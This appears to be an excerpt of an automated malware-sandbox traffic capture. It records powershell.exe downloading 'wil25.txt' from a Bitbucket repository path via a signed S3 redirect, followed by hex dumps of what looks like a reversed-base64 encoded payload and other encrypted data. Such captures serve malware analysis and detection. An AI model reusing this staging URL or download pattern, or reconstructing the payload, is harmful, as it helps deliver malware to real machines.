                                                                    Data Ascii: >psmDyM8pmKZ[<I@'IQaUvn6A^1j$qv=>dH$QG zO?Z8`f{I:'D.w2<SuA"n@wBy>s4SgqHQ$IQ$"*2$IALZ0M&;AqrhzIIvK
                                                                    2024-09-26 10:16:23 UTC1378INData Raw: 10 80 b2 3e 6a 14 88 10 4c 81 42 e2 1a 90 a2 49 1b 61 52 93 ef 4e 1a 74 25 60 cc 73 c5 32 4a 22 61 71 3e 86 8e d1 da a0 93 c9 ee 2a 37 5f 04 b1 b0 95 b7 c9 a9 b5 94 a0 c0 1d f9 ef 56 0c 46 66 52 01 5c 71 54 e4 a9 53 cc 83 e4 69 7b 7b d5 b0 a1 27 b7 bd 54 9d 09 f6 2c 43 53 8e e5 f9 19 14 bb dd 52 0f 7e 4d 11 57 28 1d 88 91 ef 55 5b 2c ea e4 c9 3c 0f 5a 92 b6 bd 0e b6 92 4f 33 eb 54 e5 43 45 b5 a8 52 e0 97 45 c6 e5 c7 63 e5 e9 14 72 0a 92 62 3b cd 46 26 f8 23 cf b7 94 f7 a5 d9 c8 c9 f2 8f de a1 75 70 49 1b 18 f9 2e c4 47 04 f7 e4 d7 ad 32 4e 33 76 02 56 a2 27 8a 6a a7 cb 84 c9 20 0e c4 77 a5 59 28 2a 04 9e 0f 78 10 47 bd 41 3a 89 e1 63 2f 18 3c a7 de 6d 80 57 70 39 9a 7e eb a7 67 f2 ff 00 0a 6a b3 8c bf 09 60 00 40 80 05 4b d9 e5 00 24 6f 91 e9 da b3 ed a7
                                                                    Data Ascii: >jLBIaRNt%`s2J"aq>*7_VFfR\qTSi{{'T,CSR~MW(U[,<ZO3TCEREcrb;F&#upI.G2N3vV'j wY(*xGA:c/<mWp9~gj`@K$o
                                                                    2024-09-26 10:16:23 UTC1378INData Raw: bb 6e 1c 52 88 91 ed 48 38 c4 0f 41 52 ae da 11 3c f7 a4 57 6b b4 73 24 cd 4f 19 11 b8 fc 91 2e 5b 85 15 79 1a 6b 73 6f 06 23 89 e2 a5 dd b6 85 1e f1 ed 4d 2e ed ca 93 31 31 d8 0a b5 5c f2 41 35 82 19 6d 92 a2 00 04 77 92 69 25 33 12 26 7f 3e d4 fe e2 d3 69 31 22 69 aa db d8 b1 c4 03 e7 da ad 42 5c 11 31 a2 db da a0 7b 01 db de a2 b3 03 74 93 cc 9a 97 b8 4c 24 f2 60 7f f2 35 17 91 40 58 3f e5 57 2b 21 97 62 05 c6 a1 c5 12 20 1f 4a 21 82 78 23 89 a7 57 8d 02 a1 06 62 9a b8 12 8f c3 03 cb 8f 3a d0 af b1 08 d5 c7 c7 8e 11 24 10 3d 38 a5 90 b1 20 48 ed eb 49 bc 80 ae 49 e7 eb 48 1b 8f 09 64 00 0c 7b c7 ef 53 a4 03 ee 3b 2b 85 f0 af 3e d4 76 9d 1b 7b 83 f4 f2 f6 a6 0b bd 95 4f cb cf d6 bd f7 a2 be c7 8f 21 d8 d1 6d 18 94 49 49 5f 24 09 ed 4b b0 a0 a5 41 3f 32
                                                                    Data Ascii: nRH8AR<Wks$O.[ykso#M.11\A5mwi%3&>i1"iB\1{tL$`5@X?W+!b J!x#Wb:$=8 HIIHd{S;+>v{O!mII_$KA?2
                                                                    2024-09-26 10:16:23 UTC1378INData Raw: 3f b5 18 2b bc f6 a8 da f9 16 47 0d ac 6e 03 fa 69 56 57 dc 83 04 18 34 d8 28 20 00 49 1e 74 b0 54 2b b4 45 03 58 09 31 c2 14 0a 07 90 a5 d0 ae 4f 95 35 4a a4 7d 7f 7a 55 2a 93 1f bd 03 09 34 3a 42 e5 30 3b 93 cd 28 95 10 78 33 14 d9 b5 40 e0 c1 14 aa 54 24 fa 8f 5a 58 10 e1 b3 b7 ce 67 f2 a5 52 e7 3c 02 60 f9 53 54 ab cb bf b4 c5 2a 90 01 f2 83 ef 34 d8 10 bb 6a 80 79 e4 51 8f cc 41 fc e9 10 41 12 3c fd e9 44 90 63 c8 c4 9f f4 a6 7d b0 23 d1 25 5d f8 f7 ef 47 e3 68 af 22 3b c0 04 fa d1 86 d2 3b a6 83 68 80 42 8f a7 71 3d e9 4a 22 40 e4 00 3c c5 1b 77 27 91 34 62 0a 55 27 b4 48 a2 a1 26 62 40 8e 38 a5 76 89 07 89 14 55 40 24 7f d2 90 82 44 93 c0 fa d0 29 a0 7b 44 f9 51 f6 03 e9 35 ef 0a 3f aa 69 26 21 12 80 13 27 99 1e bd e8 54 c8 13 3e 7e 54 b1 40 88 f9
                                                                    Data Ascii: ?+GniVW4( ItT+EX1O5J}zU*4:B0;(x3@T$ZXgR<`ST*4jyQAA<Dc}#%]Gh";;hBq=J"@<w'4bU'H&b@8vU@$D){DQ5?i&!'T>~T@
                                                                    2024-09-26 10:16:23 UTC1378INData Raw: 41 23 ca 8c 1d 05 3c 18 33 14 44 93 34 1d bd c7 a5 30 85 12 b1 30 a5 1e 3f 4a 38 56 e4 81 c7 14 88 85 7c aa 23 8f 5e c6 8c 95 80 38 23 f2 a5 81 64 5f 77 b8 a2 ee e6 29 30 e9 3b 62 62 6b c8 78 83 c8 e6 69 0b 2f c0 af cb b6 37 76 f6 a3 12 12 3b 9f a5 25 b8 ab 90 27 8f 5a 12 e4 00 20 c5 2e 3c 8e a4 c3 a8 84 09 92 68 15 09 04 03 df da 8a 54 20 c8 91 ee 68 a5 7e a3 f2 a7 e3 c0 fb 83 a8 f3 cc fb d1 16 a0 0c 02 4f ed 5e 52 80 4f 30 7e b4 91 5e d3 db b1 a6 19 b0 54 a0 39 07 b7 94 51 54 47 3c f7 34 05 5e 87 bd 11 4a 1b a0 77 34 86 c8 68 f5 fa 77 ef 49 ba 47 20 f9 d0 a9 65 22 7f 6a 49 6b e7 d7 db d2 9d 21 09 38 47 ac c5 37 74 00 47 33 12 69 57 48 3e 5c 76 22 90 58 f2 f2 3c 77 a2 42 1b 3b 11 04 09 a4 5c 02 0f b5 2e e1 32 63 69 fa d2 0e 73 23 c8 fe f5 24 44 35 58 e0
                                                                    Data Ascii: A#<3D400?J8V|#^8#d_w)0;bbkxi/7v;%'Z .<hT h~O^RO0~^T9QTG<4^Jw4hwIG e"jIk!8G7tG3iWH>\v"X<wB;\.2cis#$D5X


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.449735185.166.143.494437664C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 10:16:28 UTC101OUTGET /rulmerurk/ertertqw/downloads/wil25.txt HTTP/1.1
                                                                    Host: bitbucket.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-26 10:16:29 UTC5101INHTTP/1.1 302 Found
                                                                    Date: Thu, 26 Sep 2024 10:16:29 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 0
                                                                    Server: AtlassianEdge
                                                                    Location: https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-48dc-a094-a07a1a72e489/wil25.txt?response-content-disposition=attachment%3B%20filename%3D%22wil25.txt%22&AWSAccessKeyId=ASIA6KOSE3BNGBW4LR47&Signature=KU8K0r0pC6kOvO63BVrMZTsC7%2Bw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEMv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIEqHJaRaTsxa7hS3N4x%2FGkHhGylNp1c%2FtHaWMABp9OaTAiEAhGKa%2BaXigWinXz7qx94%2Fdz1%2BZMoaCfODDHmLNQDVpvkqpwIIExAAGgw5ODQ1MjUxMDExNDYiDE1tfzVE8xRz0o13lSqEAth9VZq4M2uouzPRXiooZ53Q4ud5xBWosJAASuO68%2Fm%2FGilxvA4dR4Hmbd9UKw1fhIOtP4fU%2BhYjpcaxW9LNtB3Tb2ZIoeIb5mSa9heTCdCH6DSktw8mBCNyPrKV88ub4XMn3grcr3V1Iqr6pH2LaAluKBUXBJSawdUMbVZqCsIwUANJ8QZfbqXe0w4%2Bx5t6Klwf6lhjxtlGxTGcNuvsngpxL3hx%2BL3kiaRNHTzbnvVr64K8%2BHAj5xyWSg2mIoh57aTjqF%2FdwefSdFVaRkDTWPsqY%2BsSkQ7CbEPDxB9aOtfvRGFWxQCean6kswq3hSbkmi0PhRIYO3UnA%2BXcKyzrCVj%2F0e3ZMK7n1LcGOp0BPNfkGu6KRQ6EXUETRUB9lmhUQOhv2S1UHbu14WIgdFZyUsk7zUgHafEANntC3hvdiPmgzCpab%2BnKFem5ZNvYAL3Ia9bDC90M2lOAmp7MD [TRUNCATED]
                                                                    Expires: Thu, 26 Sep 2024 10:16:29 GMT
                                                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                    X-Used-Mesh: False
                                                                    Vary: Accept-Language, Origin
                                                                    Content-Language: en
                                                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                    X-Dc-Location: Micros-3
                                                                    X-Served-By: 0b630014adf4
                                                                    X-Version: c76eeb855613
                                                                    X-Static-Version: c76eeb855613
                                                                    X-Request-Count: 1948
                                                                    X-Render-Time: 0.04727768898010254
                                                                    X-B3-Traceid: e7c7f418a9b2451ba66a87318177f589
                                                                    X-B3-Spanid: 878379fb0a93e386
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east- [TRUNCATED]
                                                                    X-Usage-Quota-Remaining: 999208.540
                                                                    X-Usage-Request-Cost: 805.47
                                                                    X-Usage-User-Time: 0.024164
                                                                    X-Usage-System-Time: 0.000000
                                                                    X-Usage-Input-Ops: 0
                                                                    X-Usage-Output-Ops: 0
                                                                    Age: 0
                                                                    X-Cache: MISS
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Xss-Protection: 1; mode=block
                                                                    Atl-Traceid: e7c7f418a9b2451ba66a87318177f589
                                                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                    Server-Timing: atl-edge;dur=158,atl-edge-internal;dur=4,atl-edge-upstream;dur=156,atl-edge-pop;desc="aws-eu-central-1"
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.44973852.216.210.1534437664C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 10:16:30 UTC1195OUTGET /4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-48dc-a094-a07a1a72e489/wil25.txt?response-content-disposition=attachment%3B%20filename%3D%22wil25.txt%22&AWSAccessKeyId=ASIA6KOSE3BNGBW4LR47&Signature=KU8K0r0pC6kOvO63BVrMZTsC7%2Bw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEMv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIEqHJaRaTsxa7hS3N4x%2FGkHhGylNp1c%2FtHaWMABp9OaTAiEAhGKa%2BaXigWinXz7qx94%2Fdz1%2BZMoaCfODDHmLNQDVpvkqpwIIExAAGgw5ODQ1MjUxMDExNDYiDE1tfzVE8xRz0o13lSqEAth9VZq4M2uouzPRXiooZ53Q4ud5xBWosJAASuO68%2Fm%2FGilxvA4dR4Hmbd9UKw1fhIOtP4fU%2BhYjpcaxW9LNtB3Tb2ZIoeIb5mSa9heTCdCH6DSktw8mBCNyPrKV88ub4XMn3grcr3V1Iqr6pH2LaAluKBUXBJSawdUMbVZqCsIwUANJ8QZfbqXe0w4%2Bx5t6Klwf6lhjxtlGxTGcNuvsngpxL3hx%2BL3kiaRNHTzbnvVr64K8%2BHAj5xyWSg2mIoh57aTjqF%2FdwefSdFVaRkDTWPsqY%2BsSkQ7CbEPDxB9aOtfvRGFWxQCean6kswq3hSbkmi0PhRIYO3UnA%2BXcKyzrCVj%2F0e3ZMK7n1LcGOp0BPNfkGu6KRQ6EXUETRUB9lmhUQOhv2S1UHbu14WIgdFZyUsk7zUgHafEANntC3hvdiPmgzCpab%2BnKFem5ZNvYAL3Ia9bDC90M2lOAmp7MDitjsvOKoKbCZYTOy3DolPfQ0bBGLHd6yaQTd5gEe7F1Z [TRUNCATED]
                                                                    Host: bbuseruploads.s3.amazonaws.com
                                                                    Connection: Keep-Alive
                                                                    2024-09-26 10:16:30 UTC524INHTTP/1.1 200 OK
                                                                    x-amz-id-2: wTj/nttpnfZA2tC6ZbkHOWlIaZTHfl4D2cD6Ng5x6FF3i/CnQtTW+iZdt+HJvEJXY9RKiGqOXHs=
                                                                    x-amz-request-id: 124NK3VKP0VZB8RW
                                                                    Date: Thu, 26 Sep 2024 10:16:31 GMT
                                                                    Last-Modified: Wed, 25 Sep 2024 13:45:09 GMT
                                                                    ETag: "028458cd59a8b2ba0acffa44917291ec"
                                                                    x-amz-server-side-encryption: AES256
                                                                    x-amz-version-id: NCUeYawyYfNICzupzESmWap3AG2OAmMr
                                                                    Content-Disposition: attachment; filename="wil25.txt"
                                                                    Accept-Ranges: bytes
                                                                    Content-Type: text/plain
                                                                    Server: AmazonS3
                                                                    Content-Length: 422052
                                                                    Connection: close
                                                                    2024-09-26 10:16:30 UTC15769INData Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                    Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                    2024-09-26 10:16:30 UTC16384INData Raw: 41 41 41 36 44 41 41 41 59 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 44 41 41 41 38 50 41 41 41 51 4b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 70 41 41 41 41 38 50 41 41 41 67 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4f 41 41 41 41 30 4e 41 41 41 67 2f 41 41 41 41 67 42 41 41 41 41 41 41 41 41 51 4d 41 41 41 41 74 44 41 41 41 38 50 41 41 41 51 72 41 41 41 41 54 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6f 47 41 41 41 77 2f 41 41 41 41 49 44 41 41 41 55 41 41 41 41 67 45 41 41 41 41 61 44 41 41 41 38 50 41 41 41 41 37 41 41 41 41 79 41 41 41 41 41 41 41 41 41 41 59
                                                                    Data Ascii: AAA6DAAAYEAAAAAAAAAAAAAAAAAAAAAAAAACDAAA8PAAAQKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApAAAA8PAAAgwAAAAAAAAAAAAAAAAAAAAOAAAA0NAAAg/AAAAgBAAAAAAAAQMAAAAtDAAA8PAAAQrAAAATAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoGAAAw/AAAAIDAAAUAAAAgEAAAAaDAAA8PAAAA7AAAAyAAAAAAAAAAY
                                                                    2024-09-26 10:16:30 UTC1024INData Raw: 38 50 41 41 41 51 77 41 41 41 41 69 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 59 4d 41 41 41 77 2f 41 41 41 41 36 44 41 41 41 41 44 41 41 41 41 41 41 41 41 41 49 41 41 41 41 34 4c 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 34 4e 41 41 41 77 49 41 41 41 41 41 41 41 41 41 45 41 41 41 41 51 6e 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 64 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 72 41 41 41 41 2f 44 41 41 41 34 4e 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 65 44 41 41
                                                                    Data Ascii: 8PAAAQwAAAAiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAYMAAAw/AAAA6DAAAADAAAAAAAAAIAAAA4LAAAw/AAAA/DAAA4NAAAwIAAAAAAAAAEAAAAQnAAAA/DAAA8PAAAwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQrAAAA/DAAA4NAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAeDAA
                                                                    2024-09-26 10:16:30 UTC16384INData Raw: 41 67 77 41 41 41 41 48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 51 64 41 41 41 41 77 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 62 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 6e 41 41 41 41 2f 44 41 41 41 34 50 41 41 41 77 56 41 41 41 41 48 41 41 41 41 41 4d 41 41 41 77 2f 41 41 41 41 65 72 54 67 44 44 41 41 41 34 45 41 41 41 41 41 41 41 41 41 44 41 41 41 41 51 4d 41 41 41 77 2f 41 41 41 41 7a 44 41 41 41 4d 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 72 41 41 41 41 2f 44 41 41 41 34 4e 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                    Data Ascii: AgwAAAAHAAAAAAAAAAAAAAAAAAAAQAAAAQdAAAAwDAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAwbAAAAAAAAAAAAAAgnAAAA/DAAA4PAAAwVAAAAHAAAAAMAAAw/AAAAerTgDDAAA4EAAAAAAAAADAAAAQMAAAw/AAAAzDAAAMBAAAAAAAAAAAAAAAAAAAQrAAAA/DAAA4NAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                    2024-09-26 10:16:30 UTC1024INData Raw: 41 65 72 54 67 44 2f 2f 42 38 2f 2f 50 67 2f 2f 2f 41 41 65 72 54 67 44 2f 2f 2f 2f 42 41 38 2f 2f 48 77 2f 2f 2f 41 38 2f 2f 48 41 41 2f 2f 2f 2f 41 41 34 2f 2f 50 41 2f 2f 2f 48 77 2f 2f 2f 42 41 67 2f 2f 66 41 41 34 2f 2f 2f 41 65 72 54 67 44 2f 2f 66 41 65 72 54 67 44 2f 2f 50 41 41 41 41 41 41 41 77 2f 2f 2f 42 34 2f 2f 2f 42 34 2f 2f 2f 44 41 41 41 41 41 41 77 2f 2f 2f 48 67 2f 2f 2f 50 41 2f 2f 2f 2f 41 41 41 41 41 41 77 2f 2f 2f 50 41 2f 2f 2f 2f 41 34 2f 2f 2f 48 41 41 41 41 41 67 2f 2f 2f 66 41 38 2f 2f 2f 48 41 2f 2f 2f 2f 44 41 41 41 41 77 2f 2f 2f 2f 41 34 2f 2f 2f 2f 41 34 2f 2f 2f 2f 42 41 41 41 34 2f 2f 2f 2f 42 77 2f 2f 2f 2f 44 41 2f 2f 2f 2f 2f 44 41 41 2f 2f 2f 2f 2f 44 41 2f 2f 2f 2f 66 41 34 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 48 41
                                                                    Data Ascii: AerTgD//B8//Pg///AAerTgD////BA8//Hw///A8//HAA////AA4//PA///Hw///BAg//fAA4///AerTgD//fAerTgD//PAAAAAAAw///B4///B4///DAAAAAAw///Hg///PA////AAAAAAw///PA////A4///HAAAAAg///fA8///HA////DAAAAw////A4////A4////BAAA4////Bw////DA/////DAA/////DA////fA4////////////HA
                                                                    2024-09-26 10:16:30 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                    2024-09-26 10:16:30 UTC1024INData Raw: 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 67 2f 41 41 41 41 4f 44 41 41 41 51 47 41 41 41 77 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 44 41 41 41 41 34 4c 41
                                                                    Data Ascii: Aw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAg/AAAAODAAAQGAAAwDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAA4LA
                                                                    2024-09-26 10:16:30 UTC13312INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 38 4f 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 58 43 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 46 42 41 41 41 73 4d 41 41 41 67 2f 41 41 41 41
                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAA8OAAAw/AAAA/DAAA8PAAAw/AAAAXCAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAFBAAAsMAAAg/AAAA
                                                                    2024-09-26 10:16:30 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 4d 41 41 41 41 49 46 41 41 41 77 75 41 41 41 41 39 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 51 74 41 41 41 41 46 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 5a 41 41 41 41 39 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 41 69 41 41 41 41 4a 41 41 41 41 59 4c 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 67 4b 41 41 41 51 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 55 46 41 41 41 41 2f 41 41 41 41 2f 44 41 41
                                                                    Data Ascii: AAAAAAAAAAAMAAAAIFAAAwuAAAA9DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAQtAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA9DAAA8PAAAw/AAAA/DAAA8PAAAAiAAAAJAAAAYLAAAw/AAAA/DAAA8PAAAw/AAAA/DAAAgKAAAQBAAAAAAAAAAAAAAAAAAAAAAAAAUFAAAA/AAAA/DAA
